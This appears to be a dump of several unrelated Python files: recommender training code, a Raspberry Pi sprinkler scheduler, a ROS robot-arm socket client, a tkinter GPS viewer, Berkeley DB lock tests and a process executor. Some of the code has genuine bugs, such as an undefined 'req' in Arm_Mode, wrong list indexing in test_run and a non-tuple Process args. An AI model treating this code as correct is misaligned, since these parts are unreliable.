user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration training complete" % log_time)
if np.mod(i, 100) == 0:
loss_prc = sess.run([train_loss_min, train_loss_max, train_prec1, train_prec2], feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start first iteration validation" % log_time)
vali_loss_prc = multithread_compute_vali()
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration validation complete" % log_time)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s: itr%d, training: %.5f, %.5f, %.5f, %.5f, vali: %.5f, %.5f, %.5f, %.5f" %
(log_time, i, loss_prc[0], loss_prc[1], loss_prc[2], loss_prc[3], vali_loss_prc[0], vali_loss_prc[1], vali_loss_prc[2], vali_loss_prc[3]))
if vali_loss_prc[2] > best_metric[2]:
best_metric[2] = vali_loss_prc[2]
best_save_path = os.path.join(vali_path, 'best-pre1')
best_save_path = saver.save(sess, best_save_path)
if vali_loss_prc[3] > best_metric[3]:
best_metric[3] = vali_loss_prc[3]
best_save_path = os.path.join(vali_path, 'best-pre2')
best_save_path = saver.save(sess, best_save_path)
save_path = os.path.join(vali_path, 'most_recent_iter')
save_path = saver.save(sess, save_path)
# test
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare test data" % log_time)
test_thread_user, size_user_test, max_time_test, news_cnt_short_test, u_t_dispid_test, \
u_t_dispid_split_ut_test, u_t_dispid_feature_test, click_feature_test, click_sub_index_test, \
u_t_clickid_test, ut_dense_test = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.test_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare test data end" % log_time)
best_save_path = os.path.join(vali_path, 'best-pre1')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre1!!!, test: %.5f, vali: %.5f" % (test_loss_prc[2], vali_loss_prc[2]))
best_save_path = os.path.join(vali_path, 'best-pre2')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre2!!!, test: %.5f, vali: %.5f" % (test_loss_prc[3], vali_loss_prc[3]))
|
scheduler.py
|
#!/usr/bin/python
import pigpio
from datetime import datetime
import time
import os
from apscheduler.schedulers.background import BackgroundScheduler
import SocketServer
import threading
### TBD
# Start a thread to update variables when notified by settings.py
# Automatic delay when precipitation is reported by forecastio
### Global variables
# Change this to match the GPIO numbers for the pins you connect to your relay board
station = [5,6,12,13,16,19,20,21]
running = False
enabled = True
delay = False
pi = pigpio.pi()
futuretime = time.time()
# Create some custom threading classes here
class ThreadedServer(SocketServer.BaseRequestHandler):
def handle(self):
global running
global enabled
global delay
global futuretime
data = "dummy"
print "Client connected with ", self.client_address
while len(data):
data = self.request.recv(1024)
if data:
print "received " + data + " from client"
# Set the response based on the data
(command,var) = data.split(":")
if "test_run" in command:
if var == "cancel":
running = False
else:
running = True
elif "status" in data:
if enabled == False:
# send the message to the client
self.request.send("disabled:%s" % str(futuretime))
elif running:
self.request.send("running")
else:
self.request.send("stopped")
elif "pause" in data:
scheduler.pause() # What about delay then pause?
enabled = False
delay = False
futuretime = time.time()
elif "resume" in data:
scheduler.resume()
enabled = True
delay = False
elif "delay" in data:
scheduler.pause()
futuretime = time.time() + (float(var) * 3600)
enabled = False
delay = True
else:
self.request.send("error")
print "Client exited"
self.request.close()
if "test_run" in command:
if not var == "cancel":
temp(var)
#test_run(var)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ThreadingTimer(object):
def __init__(self, interval=30):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
global running
global enabled
global delay
global futuretime
while True:
# Do something
if time.time() >= futuretime and enabled == False and delay == True:
scheduler.resume()
enabled = True
delay = False
time.sleep(self.interval)
# Setup GPIO pins
for i in station:
pi.set_mode(i, pigpio.OUTPUT)
def all_off():
for i in station:
pi.write(i, 1)
def temp(t):
global running
x = 1
while running:
print "Station %s ON" % x
time.sleep(int(t))
print "Station %s OFF" % x
time.sleep(1)
x+=1
if x > len(station):
running = False
all_off()
print "JOB ENDED"
def test_run(t):
running = True
for i in station:
pi.write(station[i], 0)
time.sleep(t)
pi.write(station[i], 1)
time.sleep(1)
for i in station:
pi.write(station[i], 1)
running = False
# For now, this function is your main program. This will be implemented in program.py later.
def job1():
print("Job 1 running!")
running = True
pi.write(station[0], 0)
time.sleep(600)
pi.write(station[0], 1)
time.sleep(1)
pi.write(station[1], 0)
time.sleep(600)
pi.write(station[1], 1)
time.sleep(1)
pi.write(station[0], 0)
time.sleep(300)
pi.write(station[0], 1)
time.sleep(1)
pi.write(station[1], 0)
time.sleep(300)
pi.write(station[1], 1)
time.sleep(1)
pi.write(station[2], 0)
time.sleep(600)
pi.write(station[2], 1)
time.sleep(1)
pi.write(station[3], 0)
time.sleep(600)
pi.write(station[3], 1)
time.sleep(1)
pi.write(station[4], 0)
time.sleep(600)
pi.write(station[4], 1)
time.sleep(1)
pi.write(station[5], 0)
time.sleep(600)
pi.write(station[5], 1)
time.sleep(1)
pi.write(station[6], 0)
time.sleep(600)
pi.write(station[6], 1)
running = False
if __name__ == '__main__':
# Maker sure that all stations are turned off initially
all_off()
scheduler = BackgroundScheduler()
# Change this to manage what days and time you want to run your job
scheduler.add_job(job1, 'cron', day_of_week='mon,wed,fri,sun', hour=6, minute=30)
scheduler.start()
print('Press Ctrl+{0} to exit'.format('Break' if os.name == 'nt' else 'C'))
server = ThreadedTCPServer(('',5555), ThreadedServer)
server.serve_forever()
timer = ThreadedTimer()
all_off()
client.close()
scheduler.shutdown(wait=False)
|
process.py
|
from multiprocessing import Process, Queue
from promise import Promise
from .utils import process
def queue_process(q):
promise, fn, args, kwargs = q.get()
process(promise, fn, args, kwargs)
class ProcessExecutor(object):
def __init__(self):
self.processes = []
self.q = Queue()
def wait_until_finished(self):
for _process in self.processes:
_process.join()
self.q.close()
self.q.join_thread()
def execute(self, fn, *args, **kwargs):
promise = Promise()
self.q.put([promise, fn, args, kwargs], False)
_process = Process(target=queue_process, args=(self.q))
_process.start()
self.processes.append(_process)
return promise
|
Hiwin_RT605_ArmCommand_Socket_20190627160325.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
|
mainwindow.py
|
"""
A GUI for PY GPS NMEA written with tkinter
"""
import os
import multiprocessing
import threading
import tkinter
import tkinter.filedialog
import tkinter.messagebox
import tkinter.scrolledtext
import tkinter.ttk
import serial
import pygpsnmea.capturefile as capturefile
import pygpsnmea.export as export
import pygpsnmea.kml as kml
import pygpsnmea.nmea as nmea
import pygpsnmea.serialinterface as serialinterface
import pygpsnmea.version as version
import pygpsnmea.gui.exporttab as exporttab
import pygpsnmea.gui.guihelp as guihelp
import pygpsnmea.gui.positionstab as positionstab
import pygpsnmea.gui.serialsettingswindow as serialsettingswindow
import pygpsnmea.gui.statustab as statustab
import pygpsnmea.gui.textboxtab as textboxtab
class StatsWindow(tkinter.Toplevel):
"""
pop out window to display GPS stats
Args:
window(tkinter.Tk): the main window to spawn from
Attributes:
window(tkinter.Tk): window to spawn from
helpbox(HelpTab): help tab with dropdown to select help topics
"""
def __init__(self, window):
tkinter.Toplevel.__init__(self, window)
self.window = window
self.statsbox = textboxtab.TextBoxTab(self)
self.statsbox.pack()
currentstats = self.window.sentencemanager.stats()
displaytxt = export.create_summary_text(currentstats)
self.statsbox.append_text(displaytxt)
class TabControl(tkinter.ttk.Notebook):
"""
organise the main tabs
Note:
tabs go from left to right
Args:
window(tkinter.Tk): the main window this spawns from
Attributes:
window(tkinter.Tk): window to spawn from
statustab(statustab.StatusTab): first tab on the gui
display GPS position status
sentencestab(textboxtab.TextBoxTab): display all the NMEA sentences
positionstab(positionstab.PosRepTab): all the positions in a table
exporttab(exporttab.ExportTab): options to export files from
PY GPS NMEA
"""
def __init__(self, window):
tkinter.ttk.Notebook.__init__(self, window)
self.window = window
self.statustab = statustab.StatusTab(self)
self.add(self.statustab, text='Status')
self.sentencestab = textboxtab.TextBoxTab(self)
self.add(self.sentencestab, text='Sentences')
self.positionstab = positionstab.PosRepTab(self)
self.add(self.positionstab, text='Position Reports')
self.exporttab = exporttab.ExportTab(self)
self.add(self.exporttab, text='Export')
class BasicGUI(tkinter.Tk):
"""
a basic GUI using tkinter to control the program
Attributes:
sentencemanager(nmea.NMEASentenceManager): deals with NMEA sentences
statuslabel(tkinter.Label): forms the status bar at the top of the
main window
serialread(bool): are we reading from the serial device?
serialprocess(multiprocessing.Process): process to read from the
serial device
livemap(bool): are we writing out to a live kml map?
recordedtimes(list): list to hold timestamps
mpq(multiprocessing.Queue): queue to send/recieve data
between processes
stopevent(threading.Event): event to stop read from serial device and
thread that updates the GUI displays
updateguithread(threading.Thread): thread used to update displayed
data in the GUI
currentupdatethreadid(int): id of the thread currently used to update
the GUI
tabcontrol(TabControl): object to organised the tabs in the GUI
threadlock(threading.Lock): used by the update thread to lock access to
the data it requires
"""
serialsettings = {'Serial Device': '',
'Baud Rate': 9600,
'Log File Path': '',
'KML File Path': ''}
def __init__(self):
tkinter.Tk.__init__(self)
self.sentencemanager = nmea.NMEASentenceManager()
self.protocol("WM_DELETE_WINDOW", self.quit)
self.title('PY GPS NMEA - ' + version.VERSION)
self.statuslabel = tkinter.Label(self, text='', bg='light grey')
self.statuslabel.pack(fill=tkinter.X)
self.serialread = False
self.serialprocess = None
self.livemap = None
self.recordedtimes = []
self.mpq = multiprocessing.Queue()
self.stopevent = threading.Event()
self.updateguithread = None
self.currentupdatethreadid = None
self.tabcontrol = TabControl(self)
self.tabcontrol.pack(expand=1, fill='both')
self.top_menu()
self.threadlock = threading.Lock()
def clear_gui(self, prompt=True):
"""
clear the gui of all data
Args:
prompt(bool): if true prompt the user before clearing data
default is True
"""
if prompt:
res = tkinter.messagebox.askyesno(
'Clearing GUI', 'Unexported data will be lost, are you sure?')
else:
res = True
if res:
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING',
'Cannot clear GUI whilst reading from the serial device.')
else:
self.statuslabel.config(text='', bg='light grey')
self.tabcontrol.sentencestab.clear()
self.tabcontrol.positionstab.clear()
self.tabcontrol.statustab.clear_stats()
self.sentencemanager.clear_data()
self.update_idletasks()
def serial_settings(self):
"""
open the serial settings window
"""
serialsettingswindow.SerialSettingsWindow(self)
def top_menu(self):
"""
format and add the top menu to the main window
"""
menu = tkinter.Menu(self)
openfileitem = tkinter.Menu(menu, tearoff=0)
openfileitem.add_command(label='Open', command=self.open_file)
openfileitem.add_command(label='Clear GUI', command=self.clear_gui)
openfileitem.add_command(label='Quit', command=self.quit)
settingsitem = tkinter.Menu(menu, tearoff=0)
settingsitem.add_command(
label='Serial Settings', command=self.serial_settings)
settingsitem.add_command(
label='Start read from serial port',
command=self.start_serial_read)
settingsitem.add_command(
label='Stop read from serial port', command=self.stop_serial_read)
helpitem = tkinter.Menu(menu, tearoff=0)
helpitem.add_command(label='Help', command=self.help)
helpitem.add_command(label='Stats', command=self.stats)
menu.add_cascade(label='File', menu=openfileitem)
menu.add_cascade(label='Settings', menu=settingsitem)
menu.add_cascade(label='Info', menu=helpitem)
self.config(menu=menu)
def help(self):
"""
display the help window
"""
guihelp.HelpWindow(self)
def stats(self):
"""
display gps stats
"""
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING', 'Stop reading from the serial device first!')
else:
StatsWindow(self)
def start_serial_read(self):
"""
start reading from a serial device
"""
if self.serialsettings['Serial Device'] == '':
tkinter.messagebox.showwarning(
'Serial Device', 'please specify a serial device to read from')
return
if not os.path.exists(self.serialsettings['Serial Device']):
tkinter.messagebox.showerror(
'Serial Device',
'path to device "{}" does not exist'.format(
self.serialsettings['Serial Device']))
return
try:
serialinterface.test_serial_interface_connection(
self.serialsettings['Serial Device'],
self.serialsettings['Baud Rate'])
except serial.SerialException:
tkinter.messagebox.showerror(
'Serial Device',
'cannot read from serial device "{}"'.format(
self.serialsettings['Serial Device']))
return
if self.serialsettings['KML File Path'] != '':
self.livemap = kml.LiveKMLMap(self.serialsettings['KML File Path'])
self.livemap.create_netlink_file()
self.serialread = True
self.stopevent.clear()
self.updateguithread = threading.Thread(
target=self.updategui, args=(self.stopevent,))
self.updateguithread.setDaemon(True)
if not self.updateguithread.is_alive():
self.updateguithread.start()
self.currentupdatethreadid = self.updateguithread.ident
self.serialprocess = multiprocessing.Process(
target=serialinterface.mp_serial_interface,
args=[self.mpq, self.serialsettings['Serial Device'],
self.serialsettings['Baud Rate']],
kwargs={'logpath': self.serialsettings['Log File Path']})
self.serialprocess.start()
self.statuslabel.config(
text='Reading NMEA sentences from {}'.format(
self.serialsettings['Serial Device']),
fg='black', bg='green2')
def stop_serial_read(self):
"""
stop reading from the serial device
"""
self.serialread = False
self.serialprocess.terminate()
self.serialprocess = None
self.stopevent.set()
self.updateguithread.join(timeout=1)
self.currentupdatethreadid = None
self.updateguithread = None
tkinter.messagebox.showinfo(
'Serial Device', 'Stopped read from {}'.format(
self.serialsettings['Serial Device']))
self.statuslabel.config(text='', bg='light grey')
def open_file(self):
"""
pop open a file browser to allow the user to choose which NMEA 0183
text file they want to process and then process it
"""
if self.serialread:
tkinter.messagebox.showwarning(
'WARNING', 'Stop reading from the serial device first!')
else:
try:
inputfile = tkinter.filedialog.askopenfilename(
filetypes=(("NMEA 0183 text files", "*.txt *.nmea"),))
if inputfile:
self.clear_gui(prompt=False)
self.statuslabel.config(
text='Loading capture file - {}'.format(inputfile),
fg='black', bg='gold')
self.update_idletasks()
self.sentencemanager, sentences = \
capturefile.open_text_file(inputfile)
for tstamp in self.sentencemanager.positions:
pos = self.sentencemanager.positions[tstamp]
latestpos = [pos['position no'], pos['latitude'],
pos['longitude'], pos['time']]
self.tabcontrol.positionstab.add_new_line(latestpos)
for sentence in sentences:
self.tabcontrol.sentencestab.append_text(sentence)
self.tabcontrol.statustab.write_stats()
self.statuslabel.config(
text='Loaded capture file - {}'.format(inputfile),
fg='black', bg='light grey')
self.update_idletasks()
except (FileNotFoundError, TypeError):
self.statuslabel.config(text='', bg='light grey')
self.update_idletasks()
return
def updategui(self, stopevent):
"""
update the nmea sentence manager from the serial port
run in another thread whist the server is running and
get NMEA sentences from the queue and process them
Args:
stopevent(threading.Event): a threading stop event
"""
while not stopevent.is_set():
if threading.get_ident() == self.currentupdatethreadid:
qdata = self.mpq.get()
if qdata:
with self.threadlock:
self.tabcontrol.sentencestab.append_text(qdata)
self.sentencemanager.process_sentence(qdata)
try:
posrep = self.sentencemanager.get_latest_position()
if posrep['time'] not in self.recordedtimes:
self.tabcontrol.sentencestab.append_text(qdata)
latestpos = [
posrep['position no'], posrep['latitude'],
posrep['longitude'], posrep['time']]
self.tabcontrol.positionstab.add_new_line(
latestpos)
self.recordedtimes.append(posrep['time'])
if self.livemap:
self.livemap.kmldoc.clear()
self.livemap.create_kml_header('live map')
self.livemap.add_kml_placemark(
posrep['time'], 'last known position',
str(posrep['longitude']),
str(posrep['latitude']))
self.livemap.close_kml_file()
self.livemap.write_kml_doc_file()
self.tabcontrol.statustab.write_stats()
except nmea.NoSuitablePositionReport:
continue
def quit(self):
"""
open a confirmation box asking if the user wants to quit if yes then
stop the serial device and exit the program
"""
res = tkinter.messagebox.askyesno('Exiting Program', 'Are you sure?')
if res:
if self.serialread:
self.stop_serial_read()
self.destroy()
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test01_simple..." % self.__class__.__name__
anID = self.env.lock_id()
if verbose:
print "locker ID: %s" % anID
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print "Acquired lock: %s" % lock
self.env.lock_put(lock)
if verbose:
print "Released lock: %s" % lock
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test02_threaded..." % self.__class__.__name__
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
# Floating point rounding
self.assertTrue((end_time-start_time) >= 0.0999)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print "%s: locker ID: %s" % (name, anID)
for i in xrange(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print "%s: Acquired %s lock: %s" % (name, lt, lock)
self.env.lock_put(lock)
if verbose:
print "%s: Released %s lock: %s" % (name, lt, lock)
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
tkgpio.py
|
from .base import TkDevice, SingletonMeta
from .base import PreciseMockTriggerPin, PreciseMockFactory, PreciseMockChargingPin
from gpiozero import Device
from gpiozero.pins.mock import MockPWMPin
